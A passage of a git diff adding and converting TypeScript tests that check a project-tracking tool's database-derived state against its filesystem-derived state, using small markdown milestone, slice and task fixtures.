+  assert.deepStrictEqual(dbState.activeSlice?.id ?? null, fileState.activeSlice?.id ?? null, `${prefix}: activeSlice.id`);
+  assert.deepStrictEqual(dbState.activeSlice?.title ?? null, fileState.activeSlice?.title ?? null, `${prefix}: activeSlice.title`);
+  assert.deepStrictEqual(dbState.activeTask?.id ?? null, fileState.activeTask?.id ?? null, `${prefix}: activeTask.id`);
+  assert.deepStrictEqual(dbState.activeTask?.title ?? null, fileState.activeTask?.title ?? null, `${prefix}: activeTask.title`);
+
+  // Blockers
+  assert.deepStrictEqual(dbState.blockers.length, fileState.blockers.length, `${prefix}: blockers.length`);
+
+  // Next action (may differ in wording between paths — compare presence)
+  assert.ok(typeof dbState.nextAction === 'string', `${prefix}: nextAction is string`);
+
+  // Registry — length and each entry
+  assert.deepStrictEqual(dbState.registry.length, fileState.registry.length, `${prefix}: registry.length`);
+  for (let i = 0; i < fileState.registry.length; i++) {
+    assert.deepStrictEqual(dbState.registry[i]?.id, fileState.registry[i]?.id, `${prefix}: registry[${i}].id`);
+    assert.deepStrictEqual(dbState.registry[i]?.status, fileState.registry[i]?.status, `${prefix}: registry[${i}].status`);
+    // dependsOn may or may not be present
+    assert.deepStrictEqual(
+      JSON.stringify(dbState.registry[i]?.dependsOn ?? []),
+      JSON.stringify(fileState.registry[i]?.dependsOn ?? []),
+      `${prefix}: registry[${i}].dependsOn`,
+    );
+  }
+
+  // Requirements
+  assert.deepStrictEqual(dbState.requirements?.active ?? 0, fileState.requirements?.active ?? 0, `${prefix}: requirements.active`);
+  assert.deepStrictEqual(dbState.requirements?.validated ?? 0, fileState.requirements?.validated ?? 0, `${prefix}: requirements.validated`);
+  assert.deepStrictEqual(dbState.requirements?.total ?? 0, fileState.requirements?.total ?? 0, `${prefix}: requirements.total`);
+
+  // Progress
+  assert.deepStrictEqual(dbState.progress?.milestones?.done, fileState.progress?.milestones?.done, `${prefix}: progress.milestones.done`);
+  assert.deepStrictEqual(dbState.progress?.milestones?.total, fileState.progress?.milestones?.total, `${prefix}: progress.milestones.total`);
+  assert.deepStrictEqual(dbState.progress?.slices?.done ?? 0, fileState.progress?.slices?.done ?? 0, `${prefix}: progress.slices.done`);
+  assert.deepStrictEqual(dbState.progress?.slices?.total ?? 0, fileState.progress?.slices?.total ?? 0, `${prefix}: progress.slices.total`);
+  assert.deepStrictEqual(dbState.progress?.tasks?.done ?? 0, fileState.progress?.tasks?.done ?? 0, `${prefix}: progress.tasks.done`);
+  assert.deepStrictEqual(dbState.progress?.tasks?.total ?? 0, fileState.progress?.tasks?.total ?? 0, `${prefix}: progress.tasks.total`);
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Scenario fixtures
+// ═══════════════════════════════════════════════════════════════════════════
+
+describe('derive-state-crossval', async () => {
+
+  // ─── Scenario A: Pre-planning — milestone with CONTEXT but no roadmap ──
+  test('crossval A: pre-planning', async () => {
+    const base = createFixtureBase();
+    try {
+      writeFile(base, 'milestones/M001/M001-CONTEXT.md', '# M001: New Project\n\nWe are exploring scope.');
+
+      // Filesystem derivation
+      invalidateStateCache();
+      const fileState = await _deriveStateImpl(base);
+
+      // DB derivation via migration
+      openDatabase(':memory:');
+      migrateHierarchyToDb(base);
+
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      assertStatesEqual(dbState, fileState, 'A-preplan');
+      assert.deepStrictEqual(dbState.phase, 'pre-planning', 'A-preplan: phase is pre-planning');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Scenario B: Executing — 2 slices, first complete, second active ──
+  test('crossval B: executing', async () => {
+    const base = createFixtureBase();
+    try {
+      const roadmap = `# M001: Test Project
+
+**Vision:** Test executing state.
+
+## Slices
+
+- [x] **S01: Foundation** \`risk:low\` \`depends:[]\`
+  > After this: Foundation laid.
+
+- [ ] **S02: Core Logic** \`risk:medium\` \`depends:[S01]\`
+  > After this: Core working.
+`;
+      const planS02 = `---
+estimated_steps: 2
+estimated_files: 1
+skills_used: []
+---
+
+# S02: Core Logic
+
+**Goal:** Build core logic.
+**Demo:** Tests pass.
+
+## Tasks
+
+- [x] **T01: Setup** \`est:15m\`
+  Setup task.
+
+- [ ] **T02: Implement** \`est:30m\`
+  Implementation task.
+`;
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', roadmap);
+      // S01 complete — needs a summary
+      writeFile(base, 'milestones/M001/slices/S01/S01-SUMMARY.md', '---\nid: S01\nparent: M001\n---\n\n# S01: Foundation\n\nDone.');
+      writeFile(base, 'milestones/M001/slices/S01/S01-PLAN.md', `# S01: Foundation\n\n**Goal:** Lay foundation.\n**Demo:** Done.\n\n## Tasks\n\n- [x] **T01: Init** \`est:10m\`\n  Init.\n`);
+      // S02 active with plan
+      writeFile(base, 'milestones/M001/slices/S02/S02-PLAN.md', planS02);
+      writeFile(base, 'milestones/M001/slices/S02/tasks/.gitkeep', '');
+      writeFile(base, 'milestones/M001/slices/S02/tasks/T01-PLAN.md', '# T01 Plan');
+      writeFile(base, 'milestones/M001/slices/S02/tasks/T01-SUMMARY.md', '---\nid: T01\n---\n\n# T01\n\nDone.');
+      writeFile(base, 'milestones/M001/slices/S02/tasks/T02-PLAN.md', '# T02 Plan');
+
+      invalidateStateCache();
+      const fileState = await _deriveStateImpl(base);
+
+      openDatabase(':memory:');
+      migrateHierarchyToDb(base);
+
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      assertStatesEqual(dbState, fileState, 'B-executing');
+      assert.deepStrictEqual(dbState.phase, 'executing', 'B-executing: phase is executing');
+      assert.deepStrictEqual(dbState.activeSlice?.id, 'S02', 'B-executing: activeSlice is S02');
+      assert.deepStrictEqual(dbState.activeTask?.id, 'T02', 'B-executing: activeTask is T02');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Scenario C: Summarizing — all tasks done, no slice summary ────────
+  test('crossval C: summarizing', async () => {
+    const base = createFixtureBase();
+    try {
+      const roadmap = `# M001: Summarize Test
+
+**Vision:** Test summarizing state.
+
+## Slices
+
+- [ ] **S01: Only Slice** \`risk:low\` \`depends:[]\`
+  > After this: Done.
+`;
+      const plan = `---
+estimated_steps: 2
+estimated_files: 1
+skills_used: []
+---
+
+# S01: Only Slice
+
+**Goal:** Do everything.
+**Demo:** All done.
+
+## Tasks
+
+- [x] **T01: First** \`est:10m\`
+  First task.
+
+- [x] **T02: Second** \`est:10m\`
+  Second task.
+`;
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', roadmap);
+      writeFile(base, 'milestones/M001/slices/S01/S01-PLAN.md', plan);
+      writeFile(base, 'milestones/M001/slices/S01/tasks/.gitkeep', '');
+      writeFile(base, 'milestones/M001/slices/S01/tasks/T01-PLAN.md', '# T01 Plan');
+      writeFile(base, 'milestones/M001/slices/S01/tasks/T02-PLAN.md', '# T02 Plan');
+      writeFile(base, 'milestones/M001/slices/S01/tasks/T01-SUMMARY.md', '---\nid: T01\nparent: S01\nmilestone: M001\n---\n# T01 Summary\nDone.');
+      writeFile(base, 'milestones/M001/slices/S01/tasks/T02-SUMMARY.md', '---\nid: T02\nparent: S01\nmilestone: M001\n---\n# T02 Summary\nDone.');
+      // Tasks have summaries, but no S01-SUMMARY.md — should be summarizing
+
+      invalidateStateCache();
+      const fileState = await _deriveStateImpl(base);
+
+      openDatabase(':memory:');
+      migrateHierarchyToDb(base);
+
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      assertStatesEqual(dbState, fileState, 'C-summarizing');
+      assert.deepStrictEqual(dbState.phase, 'summarizing', 'C-summarizing: phase is summarizing');
+      assert.deepStrictEqual(dbState.activeSlice?.id, 'S01', 'C-summarizing: activeSlice is S01');
+      assert.deepStrictEqual(dbState.activeTask, null, 'C-summarizing: no activeTask');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Scenario D: Multi-milestone — M001 complete, M002 active ─────────
+  test('crossval D: multi-milestone', async () => {
+    const base = createFixtureBase();
+    try {
+      const m1Roadmap = `# M001: First Milestone
+
+**Vision:** Already done.
+
+## Slices
+
+- [x] **S01: Done Slice** \`risk:low\` \`depends:[]\`
+  > After this: Done.
+`;
+      const m2Roadmap = `# M002: Second Milestone
+
+**Vision:** Currently active.
+
+## Slices
+
+- [ ] **S01: Active Slice** \`risk:low\` \`depends:[]\`
+  > After this: Active work done.
+`;
+      const m2Plan = `---
+estimated_steps: 1
+estimated_files: 1
+skills_used: []
+---
+
+# S01: Active Slice
+
+**Goal:** Do the work.
+**Demo:** It works.
+
+## Tasks
+
+- [ ] **T01: Work** \`est:30m\`
+  Do the work.
+`;
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', m1Roadmap);
+      writeFile(base, 'milestones/M001/M001-VALIDATION.md', '---\nverdict: pass\nremediation_round: 0\n---\n\n# Validation\nPassed.');
+      writeFile(base, 'milestones/M001/M001-SUMMARY.md', '# M001 Summary\n\nFirst milestone complete.');
+      writeFile(base, 'milestones/M002/M002-ROADMAP.md', m2Roadmap);
+      writeFile(base, 'milestones/M002/slices/S01/S01-PLAN.md', m2Plan);
+      writeFile(base, 'milestones/M002/slices/S01/tasks/.gitkeep', '');
+      writeFile(base, 'milestones/M002/slices/S01/tasks/T01-PLAN.md', '# T01 Plan');
+
+      invalidateStateCache();
+      const fileState = await _deriveStateImpl(base);
+
+      openDatabase(':memory:');
+      migrateHierarchyToDb(base);
+
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      assertStatesEqual(dbState, fileState, 'D-multims');
+      assert.deepStrictEqual(dbState.activeMilestone?.id, 'M002', 'D-multims: activeMilestone is M002');
+      assert.deepStrictEqual(dbState.registry.length, 2, 'D-multims: 2 milestones in registry');
+
+      const m1 = dbState.registry.find(e => e.id === 'M001');
+      const m2 = dbState.registry.find(e => e.id === 'M002');
+      assert.deepStrictEqual(m1?.status, 'complete', 'D-multims: M001 complete');
+      assert.deepStrictEqual(m2?.status, 'active', 'D-multims: M002 active');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Scenario E: Blocked — circular slice deps ────────────────────────
+  test('crossval E: blocked', async () => {
+    const base = createFixtureBase();
+    try {
+      const roadmap = `# M001: Blocked Test
+
+**Vision:** Test blocked state.
+
+## Slices
+
+- [ ] **S01: First** \`risk:low\` \`depends:[S02]\`
+  > After this: First done.
+
+- [ ] **S02: Second** \`risk:low\` \`depends:[S01]\`
+  > After this: Second done.
+`;
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', roadmap);
+
+      invalidateStateCache();
+      const fileState = await _deriveStateImpl(base);
+
+      openDatabase(':memory:');
+      migrateHierarchyToDb(base);
+
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      assertStatesEqual(dbState, fileState, 'E-blocked');
+      assert.deepStrictEqual(dbState.phase, 'blocked', 'E-blocked: phase is blocked');
+      assert.ok(dbState.blockers.length > 0, 'E-blocked: has blockers');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Scenario F: Parked — PARKED file on milestone ────────────────────
+  test('crossval F: parked', async () => {
+    const base = createFixtureBase();
+    try {
+      const roadmap = `# M001: Parked Milestone
+
+**Vision:** Parked.
+
+## Slices
+
+- [ ] **S01: Some Slice** \`risk:low\` \`depends:[]\`
+  > After this: Done.
+`;
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', roadmap);
+      writeFile(base, 'milestones/M001/M001-PARKED.md', 'Parked for now.');
+      // Second milestone picks up as active
+      writeFile(base, 'milestones/M002/M002-CONTEXT.md', '# M002: Active Milestone\n\nReady to go.');
+
+      invalidateStateCache();
+      const fileState = await _deriveStateImpl(base);
+
+      openDatabase(':memory:');
+      migrateHierarchyToDb(base);
+
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      assertStatesEqual(dbState, fileState, 'F-parked');
+      assert.deepStrictEqual(dbState.activeMilestone?.id, 'M002', 'F-parked: activeMilestone is M002');
+      assert.ok(dbState.registry.some(e => e.id === 'M001' && e.status === 'parked'), 'F-parked: M001 parked');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Scenario G: Auto-migration round-trip ────────────────────────────
+  // Create a markdown-only fixture (no DB). Migrate to DB. Both paths identical.
+  test('crossval G: auto-migration round-trip', async () => {
+    const base = createFixtureBase();
+    try {
+      const roadmap = `# M001: Migration Test
+
+**Vision:** Test migration fidelity.
+
+## Slices
+
+- [x] **S01: Done Setup** \`risk:low\` \`depends:[]\`
+  > After this: Setup done.
+
+- [ ] **S02: Active Work** \`risk:medium\` \`depends:[S01]\`
+  > After this: Work done.
+
+- [ ] **S03: Future Work** \`risk:high\` \`depends:[S02]\`
+  > After this: All done.
+`;
+      const planS02 = `---
+estimated_steps: 3
+estimated_files: 2
+skills_used: []
+---
+
+# S02: Active Work
+
+**Goal:** Do the work.
+**Demo:** Tests pass.
+
+## Tasks
+
+- [x] **T01: First** \`est:10m\`
+  First task.
+
+- [ ] **T02: Second** \`est:20m\`
+  Second task.
+
+- [ ] **T03: Third** \`est:15m\`
+  Third task.
+`;
+      const requirements = `# Requirements
+
+## Active
+
+### R001 — Core Feature
+- Status: active
+- Description: Must have core feature.
+
+## Validated
+
+### R002 — Setup
+- Status: validated
+- Description: Setup is validated.
+
+## Deferred
+
+### R003 — Nice to Have
+- Status: deferred
+- Description: Maybe later.
+`;
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', roadmap);
+      writeFile(base, 'milestones/M001/slices/S01/S01-SUMMARY.md', '---\nid: S01\nparent: M001\n---\n\n# S01: Done Setup\n\nDone.');
+      writeFile(base, 'milestones/M001/slices/S01/S01-PLAN.md', `# S01: Done Setup\n\n**Goal:** Setup.\n**Demo:** Done.\n\n## Tasks\n\n- [x] **T01: Init** \`est:10m\`\n  Init.\n`);
+      writeFile(base, 'milestones/M001/slices/S02/S02-PLAN.md', planS02);
+      writeFile(base, 'milestones/M001/slices/S02/tasks/.gitkeep', '');
+      writeFile(base, 'milestones/M001/slices/S02/tasks/T01-PLAN.md', '# T01 Plan');
+      writeFile(base, 'milestones/M001/slices/S02/tasks/T01-SUMMARY.md', '---\nid: T01\n---\n\n# T01\n\nDone.');
+      writeFile(base, 'milestones/M001/slices/S02/tasks/T02-PLAN.md', '# T02 Plan');
+      writeFile(base, 'milestones/M001/slices/S02/tasks/T03-PLAN.md', '# T03 Plan');
+      writeFile(base, 'REQUIREMENTS.md', requirements);
+
+      // Step 1: Get filesystem-only state
+      invalidateStateCache();
+      const fileState = await _deriveStateImpl(base);
+
+      // Step 2: Migrate markdown to DB
+      openDatabase(':memory:');
+      const counts = migrateHierarchyToDb(base);
+
+      // Verify migration populated correctly
+      assert.ok(counts.milestones >= 1, 'G-roundtrip: migrated milestones');
+      assert.ok(counts.slices >= 2, 'G-roundtrip: migrated slices');
+      assert.ok(counts.tasks >= 3, 'G-roundtrip: migrated tasks');
+
+      // Step 3: Get DB-backed state
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      // Step 4: Deep cross-validation
+      assertStatesEqual(dbState, fileState, 'G-roundtrip');
+      assert.deepStrictEqual(dbState.phase, 'executing', 'G-roundtrip: phase is executing');
+      assert.deepStrictEqual(dbState.activeSlice?.id, 'S02', 'G-roundtrip: activeSlice is S02');
+      assert.deepStrictEqual(dbState.activeTask?.id, 'T02', 'G-roundtrip: activeTask is T02');
+      assert.deepStrictEqual(dbState.requirements?.active, 1, 'G-roundtrip: requirements.active = 1');
+      assert.deepStrictEqual(dbState.requirements?.validated, 1, 'G-roundtrip: requirements.validated = 1');
+      assert.deepStrictEqual(dbState.requirements?.deferred, 1, 'G-roundtrip: requirements.deferred = 1');
+      assert.deepStrictEqual(dbState.requirements?.total, 3, 'G-roundtrip: requirements.total = 3');
+      assert.deepStrictEqual(dbState.progress?.slices?.done, 1, 'G-roundtrip: slices.done = 1');
+      assert.deepStrictEqual(dbState.progress?.slices?.total, 3, 'G-roundtrip: slices.total = 3');
+      assert.deepStrictEqual(dbState.progress?.tasks?.done, 1, 'G-roundtrip: tasks.done = 1');
+      assert.deepStrictEqual(dbState.progress?.tasks?.total, 3, 'G-roundtrip: tasks.total = 3');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/derive-state-db-disk-reconcile.test.ts b/src/resources/extensions/gsd/tests/derive-state-db-disk-reconcile.test.ts
new file mode 100644
index 000000000..a30251b3b
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/derive-state-db-disk-reconcile.test.ts
@@ -0,0 +1,121 @@
+/**
+ * derive-state-db-disk-reconcile.test.ts — #2416
+ *
+ * After migration to DB-backed state, milestones that exist on disk
+ * (in .gsd/milestones/) but were never imported into the DB become
+ * invisible to deriveStateFromDb(). This test verifies that
+ * deriveStateFromDb reconciles disk milestones with DB milestones.
+ */
+
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import { deriveStateFromDb, invalidateStateCache } from "../state.ts";
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+} from "../gsd-db.ts";
+import { createTestContext } from "./test-helpers.ts";
+
+const { assertEq, assertTrue, report } = createTestContext();
+
+function createFixtureBase(): string {
+  const base = mkdtempSync(join(tmpdir(), "gsd-disk-reconcile-"));
+  mkdirSync(join(base, ".gsd", "milestones"), { recursive: true });
+  return base;
+}
+
+function writeFile(base: string, relativePath: string, content: string): void {
+  const full = join(base, ".gsd", relativePath);
+  mkdirSync(join(full, ".."), { recursive: true });
+  writeFileSync(full, content);
+}
+
+function cleanup(base: string): void {
+  rmSync(base, { recursive: true, force: true });
+}
+
+const CONTEXT_CONTENT = `# M002: Disk-Only Milestone
+
+This milestone exists on disk but not in the DB.
+
+## Must-Haves
+- Something important
+`;
+
+const ROADMAP_CONTENT = `# M002: Disk-Only Milestone
+
+**Vision:** Test disk reconciliation.
+
+## Slices
+
+- [ ] **S01: First Slice** \`risk:low\` \`depends:[]\`
+  > Do something.
+`;
+
+async function main(): Promise<void> {
+  console.log("\n=== #2416: deriveStateFromDb reconciles disk milestones ===");
+
+  // Set up: M001 in DB, M002 on disk only
+  const base = createFixtureBase();
+  const dbPath = join(base, ".gsd", "gsd.db");
+
+  try {
+    openDatabase(dbPath);
+
+    // M001 is in the DB with a complete status
+    insertMilestone({ id: "M001", title: "M001: DB Milestone", status: "complete", depends_on: [] });
+    insertSlice({ id: "S01", milestoneId: "M001", title: "S01: Done Slice", status: "complete", depends: [] });
+
+    // Write M001 summary on disk (marks it complete on filesystem too)
+    writeFile(base, "milestones/M001/SUMMARY.md", "# M001: DB Milestone\n\nDone.");
+
+    // M002 exists ONLY on disk, not in DB
+    writeFile(base, "milestones/M002/CONTEXT.md", CONTEXT_CONTENT);
+    writeFile(base, "milestones/M002/ROADMAP.md", ROADMAP_CONTENT);
+
+    invalidateStateCache();
+    const state = await deriveStateFromDb(base);
+
+    // M002 should be visible in the registry
+    const m002Entry = state.registry.find((m) => m.id === "M002");
+    assertTrue(
+      m002Entry !== undefined,
+      "M002 (disk-only milestone) should appear in state.registry (#2416)",
+    );
+
+    // M001 should still be in the registry
+    const m001Entry = state.registry.find((m) => m.id === "M001");
+    assertTrue(
+      m001Entry !== undefined,
+      "M001 (DB milestone) should still appear in state.registry",
+    );
+
+    // The active milestone should be M002 (since M001 is complete)
+    assertTrue(
+      state.activeMilestone !== null,
+      "There should be an active milestone",
+    );
+    if (state.activeMilestone) {
+      assertEq(
+        state.activeMilestone.id,
+        "M002",
+        "Active milestone should be M002 (disk-only, not complete) (#2416)",
+      );
+    }
+  } finally {
+    closeDatabase();
+    cleanup(base);
+  }
+
+  report();
+}
+
+main().catch((err) => {
+  console.error(err);
+  process.exit(1);
+});
diff --git a/src/resources/extensions/gsd/tests/derive-state-db.test.ts b/src/resources/extensions/gsd/tests/derive-state-db.test.ts
index bf4092232..08ea28f8a 100644
--- a/src/resources/extensions/gsd/tests/derive-state-db.test.ts
+++ b/src/resources/extensions/gsd/tests/derive-state-db.test.ts
@@ -1,13 +1,21 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from 'node:fs';
 import { join } from 'node:path';
 import { tmpdir } from 'node:os';
 
-import { deriveState, invalidateStateCache } from '../state.ts';
-import { openDatabase, closeDatabase, insertArtifact, isDbAvailable } from '../gsd-db.ts';
-import { createTestContext } from './test-helpers.ts';
-
-const { assertEq, assertTrue, report } = createTestContext();
-
+import { deriveState, invalidateStateCache, _deriveStateImpl, deriveStateFromDb, isGhostMilestone } from '../state.ts';
+import {
+  openDatabase,
+  closeDatabase,
+  insertArtifact,
+  isDbAvailable,
+  insertMilestone,
+  getAllMilestones,
+  insertSlice,
+  insertTask,
+  updateTaskStatus,
+} from '../gsd-db.ts';
 // ─── Fixture Helpers ───────────────────────────────────────────────────────
 
 function createFixtureBase(): string {
@@ -92,11 +100,10 @@ const REQUIREMENTS_CONTENT = `# Requirements
 - Description: Already validated.
 `;
 
-async function main(): Promise<void> {
+describe('derive-state-db', async () => {
 
   // ─── Test 1: DB-backed deriveState produces identical GSDState ─────────
-  console.log('\n=== derive-state-db: DB path matches file path ===');
-  {
+  test('derive-state-db: DB path matches file path', async () => {
     const base = createFixtureBase();
     try {
       // Write files to disk (for file-only path)
@@ -110,9 +117,16 @@ async function main(): Promise<void> {
       invalidateStateCache();
       const fileState = await deriveState(base);
 
-      // Now open DB, insert matching artifacts
+      // Now open DB, insert matching artifacts + milestone hierarchy
       openDatabase(':memory:');
-      assertTrue(isDbAvailable(), 'db-match: DB is available after open');
+      assert.ok(isDbAvailable(), 'db-match: DB is available after open');
+
+      // Insert milestone hierarchy so deriveState takes the DB path (#2631 fix)
+      insertMilestone({ id: 'M001', title: 'Test Milestone', status: 'active' });
+      insertSlice({ id: 'S01', milestoneId: 'M001', title: 'First Slice', status: 'active', risk: 'low', depends: [] });
+      insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Second Slice', status: 'pending', risk: 'low', depends: ['S01'] });
+      insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'First Task', status: 'pending' });
+      insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', title: 'Done Task', status: 'complete' });
 
       insertArtifactRow('milestones/M001/M001-ROADMAP.md', ROADMAP_CONTENT, {
         artifact_type: 'roadmap',
@@ -132,36 +146,35 @@ async function main(): Promise<void> {
       const dbState = await deriveState(base);
 
       // Field-by-field equality
-      assertEq(dbState.phase, fileState.phase, 'db-match: phase matches');
-      assertEq(dbState.activeMilestone?.id, fileState.activeMilestone?.id, 'db-match: activeMilestone.id matches');
-      assertEq(dbState.activeMilestone?.title, fileState.activeMilestone?.title, 'db-match: activeMilestone.title matches');
-      assertEq(dbState.activeSlice?.id, fileState.activeSlice?.id, 'db-match: activeSlice.id matches');
-      assertEq(dbState.activeSlice?.title, fileState.activeSlice?.title, 'db-match: activeSlice.title matches');
-      assertEq(dbState.activeTask?.id, fileState.activeTask?.id, 'db-match: activeTask.id matches');
-      assertEq(dbState.activeTask?.title, fileState.activeTask?.title, 'db-match: activeTask.title matches');
-      assertEq(dbState.blockers, fileState.blockers, 'db-match: blockers match');
-      assertEq(dbState.registry.length, fileState.registry.length, 'db-match: registry length matches');
-      assertEq(dbState.registry[0]?.status, fileState.registry[0]?.status, 'db-match: registry[0] status matches');
-      assertEq(dbState.requirements?.active, fileState.requirements?.active, 'db-match: requirements.active matches');
-      assertEq(dbState.requirements?.validated, fileState.requirements?.validated, 'db-match: requirements.validated matches');
-      assertEq(dbState.requirements?.total, fileState.requirements?.total, 'db-match: requirements.total matches');
-      assertEq(dbState.progress?.milestones?.done, fileState.progress?.milestones?.done, 'db-match: milestones.done matches');
-      assertEq(dbState.progress?.milestones?.total, fileState.progress?.milestones?.total, 'db-match: milestones.total matches');
-      assertEq(dbState.progress?.slices?.done, fileState.progress?.slices?.done, 'db-match: slices.done matches');
-      assertEq(dbState.progress?.slices?.total, fileState.progress?.slices?.total, 'db-match: slices.total matches');
-      assertEq(dbState.progress?.tasks?.done, fileState.progress?.tasks?.done, 'db-match: tasks.done matches');
-      assertEq(dbState.progress?.tasks?.total, fileState.progress?.tasks?.total, 'db-match: tasks.total matches');
+      assert.deepStrictEqual(dbState.phase, fileState.phase, 'db-match: phase matches');
+      assert.deepStrictEqual(dbState.activeMilestone?.id, fileState.activeMilestone?.id, 'db-match: activeMilestone.id matches');
+      assert.deepStrictEqual(dbState.activeMilestone?.title, fileState.activeMilestone?.title, 'db-match: activeMilestone.title matches');
+      assert.deepStrictEqual(dbState.activeSlice?.id, fileState.activeSlice?.id, 'db-match: activeSlice.id matches');
+      assert.deepStrictEqual(dbState.activeSlice?.title, fileState.activeSlice?.title, 'db-match: activeSlice.title matches');
+      assert.deepStrictEqual(dbState.activeTask?.id, fileState.activeTask?.id, 'db-match: activeTask.id matches');
+      assert.deepStrictEqual(dbState.activeTask?.title, fileState.activeTask?.title, 'db-match: activeTask.title matches');
+      assert.deepStrictEqual(dbState.blockers, fileState.blockers, 'db-match: blockers match');
+      assert.deepStrictEqual(dbState.registry.length, fileState.registry.length, 'db-match: registry length matches');
+      assert.deepStrictEqual(dbState.registry[0]?.status, fileState.registry[0]?.status, 'db-match: registry[0] status matches');
+      assert.deepStrictEqual(dbState.requirements?.active, fileState.requirements?.active, 'db-match: requirements.active matches');
+      assert.deepStrictEqual(dbState.requirements?.validated, fileState.requirements?.validated, 'db-match: requirements.validated matches');
+      assert.deepStrictEqual(dbState.requirements?.total, fileState.requirements?.total, 'db-match: requirements.total matches');
+      assert.deepStrictEqual(dbState.progress?.milestones?.done, fileState.progress?.milestones?.done, 'db-match: milestones.done matches');
+      assert.deepStrictEqual(dbState.progress?.milestones?.total, fileState.progress?.milestones?.total, 'db-match: milestones.total matches');
+      assert.deepStrictEqual(dbState.progress?.slices?.done, fileState.progress?.slices?.done, 'db-match: slices.done matches');
+      assert.deepStrictEqual(dbState.progress?.slices?.total, fileState.progress?.slices?.total, 'db-match: slices.total matches');
+      assert.deepStrictEqual(dbState.progress?.tasks?.done, fileState.progress?.tasks?.done, 'db-match: tasks.done matches');
+      assert.deepStrictEqual(dbState.progress?.tasks?.total, fileState.progress?.tasks?.total, 'db-match: tasks.total matches');
 
       closeDatabase();
     } finally {
       closeDatabase();
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test 2: Fallback when DB unavailable ─────────────────────────────
-  console.log('\n=== derive-state-db: fallback when DB unavailable ===');
-  {
+  test('derive-state-db: fallback when DB unavailable', async () => {
     const base = createFixtureBase();
     try {
       writeFile(base, 'milestones/M001/M001-ROADMAP.md', ROADMAP_CONTENT);
@@ -170,22 +183,21 @@ async function main(): Promise<void> {
       writeFile(base, 'milestones/M001/slices/S01/tasks/T01-PLAN.md', '# T01 Plan');
 
       // No DB open — isDbAvailable() is false
-      assertTrue(!isDbAvailable(), 'fallback: DB is not available');
+      assert.ok(!isDbAvailable(), 'fallback: DB is not available');
       invalidateStateCache();
       const state = await deriveState(base);
 
-      assertEq(state.phase, 'executing', 'fallback: phase is executing');
-      assertEq(state.activeMilestone?.id, 'M001', 'fallback: activeMilestone is M001');
-      assertEq(state.activeSlice?.id, 'S01', 'fallback: activeSlice is S01');
-      assertEq(state.activeTask?.id, 'T01', 'fallback: activeTask is T01');
+      assert.deepStrictEqual(state.phase, 'executing', 'fallback: phase is executing');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M001', 'fallback: activeMilestone is M001');
+      assert.deepStrictEqual(state.activeSlice?.id, 'S01', 'fallback: activeSlice is S01');
+      assert.deepStrictEqual(state.activeTask?.id, 'T01', 'fallback: activeTask is T01');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test 3: Empty DB falls back to file reads ────────────────────────
-  console.log('\n=== derive-state-db: empty DB falls back to files ===');
-  {
+  test('derive-state-db: empty DB falls back to files', async () => {
     const base = createFixtureBase();
     try {
       writeFile(base, 'milestones/M001/M001-ROADMAP.md', ROADMAP_CONTENT);
@@ -193,29 +205,31 @@ async function main(): Promise<void> {
       writeFile(base, 'milestones/M001/slices/S01/tasks/.gitkeep', '');
       writeFile(base, 'milestones/M001/slices/S01/tasks/T01-PLAN.md', '# T01 Plan');
 
-      // Open DB but insert nothing — empty artifacts table
+      // Open DB but insert nothing — empty tables.
+      // With #2631 fix, deriveState will sync disk milestones into DB
+      // and then take the DB path. The result should still reflect the
+      // disk milestone correctly.
       openDatabase(':memory:');
-      assertTrue(isDbAvailable(), 'empty-db: DB is available');
+      assert.ok(isDbAvailable(), 'empty-db: DB is available');
 
       invalidateStateCache();
       const state = await deriveState(base);
 
-      // Should still work via cachedLoadFile → loadFile disk fallback
-      assertEq(state.phase, 'executing', 'empty-db: phase is executing');
-      assertEq(state.activeMilestone?.id, 'M001', 'empty-db: activeMilestone is M001');
-      assertEq(state.activeSlice?.id, 'S01', 'empty-db: activeSlice is S01');
-      assertEq(state.activeTask?.id, 'T01', 'empty-db: activeTask is T01');
+      // Milestone should be detected (synced from disk)
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M001', 'empty-db: activeMilestone is M001');
+      // The DB path without explicit slice/task rows may derive a different
+      // phase than the filesystem path, but the milestone must be found.
